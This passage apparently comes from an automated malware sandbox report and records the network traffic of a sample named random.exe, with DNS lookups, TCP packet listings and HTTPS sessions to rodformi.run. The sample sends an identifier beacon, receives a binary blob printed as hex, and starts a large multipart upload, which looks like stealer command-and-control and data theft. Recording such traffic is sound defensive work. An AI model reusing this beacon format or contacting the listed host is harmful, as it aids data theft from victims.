                                                                                              Apr 2, 2025 11:33:25.400588989 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.400607109 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.610781908 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.611141920 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.612270117 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.612292051 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.612504959 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.613588095 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.613588095 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.613641977 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.613770962 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.613780022 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.360728025 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.360843897 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.360910892 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.361771107 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.361787081 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.540852070 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.540901899 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.541095018 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.541387081 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.541404009 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.746664047 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.746905088 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.748194933 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.748202085 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.749062061 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.750340939 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.750426054 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.750683069 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:26.750739098 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:26.750747919 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:27.390494108 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:27.390602112 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:27.392498016 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:27.392498016 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:27.703413010 CEST49684443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:27.703452110 CEST44349684172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.442174911 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.442229033 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.442301989 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.442634106 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.442650080 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.648976088 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.649049044 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.650290966 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.650302887 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.650806904 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:28.652138948 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.652251005 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:28.652318001 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.177012920 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.177135944 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.177180052 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.177248955 CEST49685443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.177267075 CEST44349685172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.649494886 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.649559975 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.649631023 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.649975061 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.649985075 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.859019041 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.859097958 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.860728025 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.860758066 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.861095905 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.862426043 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.863231897 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.863285065 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.863406897 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.863456964 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.863590002 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.863639116 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.863795042 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.863864899 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.864032030 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864094019 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.864301920 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864357948 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.864377022 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864403963 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.864573956 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864619017 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.864670038 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864748001 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.864824057 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.908281088 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.908487082 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.908536911 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.908561945 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.908586979 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:29.908616066 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:29.908629894 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.465940952 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.466142893 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.466223955 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.466223955 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.513161898 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.513220072 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.513314009 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.513633013 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.513643980 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.717726946 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.717847109 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.719414949 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.719424963 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.719711065 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.720834017 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.720854998 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.720912933 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:31.765893936 CEST49686443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:31.765929937 CEST44349686172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:32.125080109 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:32.125235081 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:32.125307083 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:32.125504971 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:32.125520945 CEST44349687172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:32.125536919 CEST49687443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:32.125543118 CEST44349687172.67.197.67192.168.2.10
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Apr 2, 2025 11:33:22.078124046 CEST6155353192.168.2.101.1.1.1
                                                                                              Apr 2, 2025 11:33:22.181329966 CEST53615531.1.1.1192.168.2.10
                                                                                              Apr 2, 2025 11:33:37.338689089 CEST6336353192.168.2.101.1.1.1
                                                                                              Apr 2, 2025 11:33:37.435775995 CEST53633631.1.1.1192.168.2.10

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Apr 2, 2025 11:33:22.078124046 CEST192.168.2.101.1.1.10x3b8aStandard query (0)rodformi.runA (IP address)IN (0x0001)false
                                                                                              Apr 2, 2025 11:33:37.338689089 CEST192.168.2.101.1.1.10x7365Standard query (0)c.pki.googA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Apr 2, 2025 11:33:22.181329966 CEST1.1.1.1192.168.2.100x3b8aNo error (0)rodformi.run172.67.197.67A (IP address)IN (0x0001)false
                                                                                              Apr 2, 2025 11:33:22.181329966 CEST1.1.1.1192.168.2.100x3b8aNo error (0)rodformi.run104.21.52.83A (IP address)IN (0x0001)false
                                                                                              Apr 2, 2025 11:33:37.103326082 CEST1.1.1.1192.168.2.100x217eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                              Apr 2, 2025 11:33:37.103326082 CEST1.1.1.1192.168.2.100x217eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                              Apr 2, 2025 11:33:37.435775995 CEST1.1.1.1192.168.2.100x7365No error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Apr 2, 2025 11:33:37.435775995 CEST1.1.1.1192.168.2.100x7365No error (0)pki-goog.l.google.com142.250.80.35A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • rodformi.run

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.1049681172.67.197.674436208C:\Users\user\Desktop\random.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-04-02 09:33:22 UTC263OUTPOST /aUosoz HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                              Content-Length: 65
                                                                                              Host: rodformi.run
                                                                                              2025-04-02 09:33:22 UTC65OUTData Raw: 75 69 64 3d 36 30 62 39 66 39 65 35 34 37 36 65 35 61 64 64 65 62 64 33 35 65 65 37 38 33 31 39 33 34 34 38 32 30 63 39 34 32 36 37 38 64 63 62 61 33 63 38 33 31 30 66 39 37 37 37 26 63 69 64 3d
                                                                                              Data Ascii: uid=60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777&cid=
                                                                                              2025-04-02 09:33:23 UTC244INHTTP/1.1 200 OK
                                                                                              Date: Wed, 02 Apr 2025 09:33:23 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 33710
                                                                                              Connection: close
                                                                                              Server: cloudflare
                                                                                              Cf-Cache-Status: DYNAMIC
                                                                                              CF-RAY: 929f5308ec0041a6-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2025-04-02 09:33:23 UTC1125INData Raw: 78 af 65 79 92 e5 47 a0 88 b6 7d 78 07 e6 b5 ad 59 83 0c bf b0 96 dc f0 b5 d1 58 a6 51 6a 34 91 2a 72 a9 03 a1 34 36 e8 6b 1a 0a 33 10 25 95 be c9 fe 1c af 18 7e 53 57 18 f8 26 88 59 75 9f f0 67 78 84 c5 ab 24 79 b8 56 77 3f 07 4a 5a 9c 09 01 d2 5c 71 4b 63 2d 58 e6 f1 75 38 ab b9 b3 4a c9 23 09 3e e0 05 c9 36 a3 0e 83 33 eb 20 4f b0 3d ee 43 91 90 dd 0b 01 24 5e a9 16 6f 8f 86 75 9c da 86 99 e6 43 bb bb 83 20 98 3e 83 c2 f5 f9 96 46 8f 6d e0 57 4c 4f 55 dc e2 76 67 f6 ae 6c 89 b7 ac 56 d2 1e c8 52 e1 ad 37 14 8d a6 d1 cc 2c 77 fd 12 a3 89 b1 fd 59 b0 11 83 cf be e0 57 d2 5d 9d ef dc 99 b1 d2 e8 52 90 31 30 7b 2f 75 96 c7 0a f0 ef e3 44 d9 32 0d 2a 0f a3 71 a6 d3 f3 ab 3f d7 4f 61 d5 65 bb 8c 3f ee 56 80 e8 65 8a 34 d3 c5 26 7f 3d bb 33 69 64 82 69 4d d0
                                                                                              Data Ascii: xeyG}xYXQj4*r46k3%~SW&Yugx$yVw?JZ\qKc-Xu8J#>63 O=C$^ouC >FmWLOUvglVR7,wYW]R10{/uD2*q?Oae?Ve4&=3idiM
                                                                                              2025-04-02 09:33:23 UTC1369INData Raw: 81 44 bf c7 14 5a 58 84 99 21 c3 fb 64 16 ec 40 04 81 5e e7 41 ad 8c 01 91 4b 91 67 3b 4c 41 4b fa c3 f4 5b 62 71 e0 e9 71 aa 52 9a aa 57 1b c9 76 78 4e 57 cc 3d 70 33 4d b2 46 f3 c0 07 3c d7 58 55 4c 58 d0 af 14 dd 82 53 c1 c2 ac 0b ba 5b ec e7 1a 8a 52 3c 65 2d 8d 07 31 94 ad 3f 10 bc e3 d4 35 d9 fa 3d 69 f8 b3 74 b6 c4 cf 07 6a 0a 02 6b 71 1c f4 f9 83 7a 14 2e 39 4f 04 34 3d 8a 1b 0e ba 6a 2f 58 bb 50 83 4d 83 56 46 15 be 7a c0 fe dd e8 64 f7 cf 8e 7e 61 26 96 23 4b a2 1d 91 ea 0e 05 58 7c 96 ab ab a4 9a 39 9a 51 fd 23 28 68 fe 5b 35 5a f6 95 51 29 10 55 a1 15 27 7c cc 28 42 31 5c db c4 79 87 f0 71 e3 be 37 76 c4 b0 5e 3b 4c 9b 5c 82 3d 30 ea d3 4d b2 f9 8f e1 8c 41 41 80 32 be 7a d2 72 7b 89 33 c6 ad c3 d2 4e cf b9 38 89 16 25 11 f3 49 2c a3 7d 03 21
                                                                                              Data Ascii: DZX!d@^AKg;LAK[bqqRWvxNW=p3MF<XULXS[R<e-1?5=itjkqz.9O4=j/XPMVFzd~a&#KX|9Q#(h[5ZQ)U'|(B1\yq7v^;L\=0MAA2zr{3N8%I,}!
                                                                                              2025-04-02 09:33:23 UTC1369INData Raw: 0e 27 b2 be ae 89 0e a2 c0 73 0d 21 36 79 76 e9 99 b2 42 48 1f a3 37 eb f9 f0 13 e6 ea b5 90 1e 3b 9b 6f 4a da 4c d2 e2 84 9f da 94 82 e2 ec e1 c8 0a af 6a 1f f7 13 a4 b8 fc e0 b9 fb 8c e4 59 81 41 7b a7 fe 8d e0 94 12 b3 54 07 86 ce 1e e6 e5 7b 95 e5 05 2b b1 2f d4 56 c0 18 88 54 03 ef 1b 1c 34 ff 0c 82 b5 ae 6b b5 a5 e8 ee 08 cb bb ed fc 6a b6 3c d3 f0 02 21 94 be 14 27 e0 cb 34 26 e9 08 d8 ac 61 33 cc d9 ec 0e 33 44 63 c6 db be 60 a3 e0 eb 31 0f bc ba 33 13 79 1e 8e 0f c0 60 ad 3b 6d 08 e3 ca ce ce fe 40 87 d8 4c 96 29 71 8a 0c 85 66 d9 30 6e ec 57 49 8e 91 e4 34 67 a9 1a 93 64 ef 53 1a 91 66 f1 f2 a3 37 81 36 ac ac 14 e7 b1 14 a4 f7 89 a0 12 a5 f8 d5 bf a1 1a 3d 27 a5 e4 ae c6 8e 80 fe 36 54 f6 b4 c4 fb f7 5a 64 76 51 17 b0 95 07 da f7 c5 cb d6 7c 22
                                                                                              Data Ascii: 's!6yvBH7;oJLjYA{T{+/VT4kj<!'4&a33Dc`13y`;m@L)qf0nWI4gdSf76='6TZdvQ|"
                                                                                              2025-04-02 09:33:23 UTC1369INData Raw: 75 cb 48 fc be 52 c1 b8 65 42 82 7f de 2f a5 d0 f3 4e b2 6d 6d 39 46 a3 40 c1 80 fa fd 07 42 a0 a1 2f f4 e1 3e f7 d6 87 74 dc a9 a2 66 da 67 70 5e 6b 39 00 c6 c4 22 b9 e4 6b 39 fc 78 b9 88 15 89 be 54 6c d4 73 66 c0 7a f0 f9 d7 a5 60 1c 61 8d 59 a2 b1 58 61 ce 74 a4 1c 99 ec 18 26 ea f1 71 8f b3 13 dd 77 39 4a 61 3d 35 ef a9 d4 42 cb 03 2b 3e f7 d8 4b cd 0d ef 48 2b f7 a4 46 24 32 8d 9c ea 94 bf 64 11 de 21 8c 23 b2 d4 0b bb 76 aa e8 09 23 33 94 9b 3a 38 c0 19 08 f7 71 98 af 1d 4e 2c cf 96 2b 10 a1 66 b1 4a b5 d8 64 62 0a 1d 4a 09 c2 81 bd ff 44 94 3f 57 cb f8 b6 0e 9d 72 50 e5 26 dd b0 55 ed 46 dc 19 e0 cf f8 18 51 90 9f 2f 1f 16 b3 5c 72 be c5 c4 65 1b ff 90 ae aa eb 22 6c d3 43 c5 6a 25 0d 48 af 97 54 d2 23 0a 60 1c da a2 c9 6f 46 7a 6c a9 c7 4a e4 63
                                                                                              Data Ascii: uHReB/Nmm9F@B/>tfgp^k9"k9xTlsfz`aYXat&qw9Ja=5B+>KH+F$2d!#v#3:8qN,+fJdbJD?WrP&UFQ/\re"lCj%HT#`oFzlJc
                                                                                              2025-04-02 09:33:23 UTC1369INData Raw: 82 b0 70 82 4b d2 59 5e c1 e5 64 dc 9c 4f da dc ed b0 1e 94 cf 47 6a 97 b3 98 15 9d ea cc 6b 37 79 46 0d 6d 1b dc af 59 4f 19 89 d0 30 2c 78 56 a4 b2 f7 cb c6 3b 7d 51 ba 4a 2e f9 7f 15 5b da cd 1e e7 80 4f 11 17 a1 f4 6b 6c be e6 28 19 96 a6 c2 93 9b d7 47 b7 bf 94 ed 5a 62 d9 47 83 10 8f f8 45 71 6c c7 d5 d0 0b 50 c1 f0 9e 28 1f 59 49 60 ea 1c b3 f7 07 4a 6e b3 c4 ed 8d 4d 10 98 8a 14 ea 1f f9 4a 77 33 bf 5e 6f 5c dd 51 02 59 22 77 04 77 ef ef c5 27 c8 df 8a 89 e3 55 65 9a dc d6 a8 c5 9d 8e 45 23 b2 a2 ae 1c e5 41 65 fc f8 92 79 ba 88 c3 f1 d2 da 1a f3 5e 10 96 0f 22 51 2b 49 2a e6 fb 73 c0 fa fc 4b d2 b8 1f c6 4a b0 86 9a 58 e3 b0 9a 90 50 e1 e0 69 02 1a f3 39 06 02 c3 66 c1 21 c3 fe c5 95 b8 3e 1b 8a fa d2 88 ac 12 1d 4e 96 a5 01 cd bc 57 27 7c 48 5b
                                                                                              Data Ascii: pKY^dOGjk7yFmYO0,xV;}QJ.[Okl(GZbGEqlP(YI`JnMJw3^o\QY"ww'UeE#Aey^"Q+I*sKJXPi9f!>NW'|H[
                                                                                              2025-04-02 09:33:23 UTC1369INData Raw: e2 a0 00 a0 e5 15 53 3a cf a2 b6 51 a0 31 d4 87 42 34 62 a9 9e 0e e7 4f 70 78 eb d9 9a 89 7a 42 a2 15 d9 24 6d 01 62 a6 3e fc b1 2a e1 69 52 8d ec 69 49 71 2d 8d 7c 39 87 7e 85 5b 74 6a a0 dc 90 91 41 6c c9 34 77 9b 14 69 a9 a2 6d fe ef 95 e7 cd 95 3f b0 fb 63 5a a6 f9 81 74 ca cf 1f 0b aa 83 57 4b f3 50 ed 1a f5 31 91 a8 fb a3 ce 07 5c 06 6f fe 38 54 19 bc a1 19 fc 0c eb 15 aa 36 28 45 ca 30 40 f6 ec 9e e6 de 00 3e f6 41 ac 62 3c 84 d7 5f 8c 14 5c 14 58 f4 4b 10 77 73 26 98 a0 4e b1 86 9e 0d 0e 96 b8 e0 28 f4 27 05 3a a1 19 01 d9 2b ae 6d 33 0b 79 7d 86 dc 57 b3 fb b2 4e 38 d5 13 1b cb 2f 82 f0 a7 60 5d f2 43 b5 5d 10 ba a5 d0 b5 d9 f7 0a 35 13 20 47 7a d8 eb d4 f9 d4 7c b3 b0 f4 e2 60 46 55 09 b4 d3 63 29 79 f2 f6 5d 9c 55 f2 92 03 b4 72 80 3e e5 59 d8
                                                                                              Data Ascii: S:Q1B4bOpxzB$mb>*iRiIq-|9~[tjAl4wim?cZtWKP1\o8T6(E0@>Ab<_\XKws&N(':+m3y}WN8/`]C]5 Gz|`FUc)y]Ur>Y
                                                                                              2025-04-02 09:33:23 UTC1369INData Raw: c2 0d 83 c3 10 6a de 44 a3 27 c9 bf d4 35 a1 21 7b b1 18 95 d0 53 93 fc d4 47 c2 ff 08 08 ad 8d 8e 7e cb d3 74 4d 41 1c ed 79 3e db 17 8f 00 3f ac b9 45 5f 14 5f be bd ed 7b c9 b5 a7 68 6d a4 2d 59 9b f9 8f aa fa a9 06 59 ec 53 bd fd a9 08 f6 7f 18 21 c1 3d c9 0f fc ab 1e a4 79 8a fa 40 22 c5 05 fa 8d d8 f4 3e a6 c0 19 bc a5 4f 76 fe 56 78 68 2c 20 a3 2f 3b a2 9f a8 c8 c8 c1 d3 ba cc e5 3d 09 28 64 d6 40 22 e6 a3 6e 34 99 46 e6 d8 6d c1 df 22 91 0e ed 75 63 4d 6f 5c f4 04 88 2f 36 05 b6 4c b2 e1 ea 1f a3 83 fe d6 cc 05 8a 8d c5 7f 15 6c f3 02 81 1a 3e ee 32 9d c6 8f eb f8 0c 00 c1 0b 98 2d b6 78 26 da 3f fd 63 e1 18 79 15 4c 13 33 c4 21 6d 99 36 71 b4 a6 64 9a 75 79 3d ae f1 92 54 59 fe dc c6 0e bf e3 2d 12 f9 cf fe 06 19 fb 10 de e7 62 f2 b8 f1 aa 7c f3
                                                                                              Data Ascii: jD'5!{SG~tMAy>?E__{hm-YYS!=y@">OvVxh, /;=(d@"n4Fm"ucMo\/6Ll>2-x&?cyL3!m6qduy=TY-b|
                                                                                              2025-04-02 09:33:23 UTC1369INData Raw: 91 c5 e0 3e 03 db c9 49 3f 42 6e 1a c6 e6 73 95 53 c4 91 c0 d6 e8 32 2f 17 76 15 e2 44 cc 90 d4 b8 08 db 52 71 31 16 d3 3b a9 26 a7 39 93 7b 48 10 a4 7a 07 51 80 62 bf 5b ea a2 b6 a9 56 b6 f9 65 32 97 5a 22 97 bf b6 a0 b0 65 61 b4 cc 4d b3 34 e1 e3 f7 11 96 21 05 79 62 a1 f7 ab 24 ee ec 5b 89 f8 28 d8 18 c2 fa 41 37 c7 90 b0 77 04 96 a9 bb 72 df 5a 89 b2 1f f2 c0 c1 40 81 f7 8b e4 74 07 c7 68 f9 dd 91 d1 2c 01 71 9b 9b 4b 30 1a 83 37 6c 81 bc 19 af eb f9 6d d2 7e 9f f3 21 d7 0f 94 25 95 b0 90 27 98 40 80 e5 64 eb d5 11 9e bb e8 69 de ec fd 30 e7 7a f0 43 5f b6 a9 53 56 9c 68 54 50 25 59 35 a0 5b 82 d1 9b cf 73 7b 64 be 4b f0 21 68 cd d5 80 54 81 1f ed 6e e8 88 87 a1 69 6c 14 0f 9e 39 2b ed 89 d2 d1 14 e5 09 d3 72 d2 e4 58 24 d3 f4 2c c2 43 b9 aa f0 8c e2
                                                                                              Data Ascii: >I?BnsS2/vDRq1;&9{HzQb[Ve2Z"eaM4!yb$[(A7wrZ@th,qK07lm~!%'@di0zC_SVhTP%Y5[s{dK!hTnil9+rX$,C
                                                                                              2025-04-02 09:33:23 UTC211INData Raw: 88 c4 55 10 15 5c 0d 9d 4e ab c8 50 6f ea f7 0e 04 ad 98 16 16 a3 cd 2f 0e 40 a9 4a 04 db c3 88 34 b7 c2 3c 06 0a 86 4f 6c 2d 92 7f a0 c9 b3 9a 5d b1 36 9a a4 c3 f1 80 d4 4a 9a d1 2d bb 60 42 43 1e d7 79 00 8b 5c a9 6b 8c 3b 77 2c 75 49 7c d8 e3 81 00 ed dc dd 00 35 73 6f 72 84 05 1e c7 0f 46 98 1a 4f 82 6a 21 d4 3b 19 00 be 98 4b 62 7a 63 4d 0d 1a b7 41 13 88 02 cc 42 f1 c1 a7 6f 97 3f 1d 5f aa ae b4 37 5b b8 e1 7b e1 59 85 95 1c ee 1b 51 d7 56 92 9a b2 1d d9 56 92 db 0a 2f 57 eb cf d5 70 f8 f8 6e fe f3 42 3b 25 8f 90 3b 90 27 79 fe 0f f3 20 74 6b 48 9e 79 72 0e dd b1 27 c6 c9 e7 6c 90 e1 56 70 b9 a3 ea 77 28 58 93 73 56 54
                                                                                              Data Ascii: U\NPo/@J4<Ol-]6J-`BCy\k;w,uI|5sorFOj!;KbzcMABo?_7[{YQVV/WpnB;%;'y tkHyr'lVpw(XsVT


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.1049682172.67.197.674436208C:\Users\user\Desktop\random.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-04-02 09:33:24 UTC271OUTPOST /aUosoz HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=MYI1hYv5
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                              Content-Length: 14903
                                                                                              Host: rodformi.run
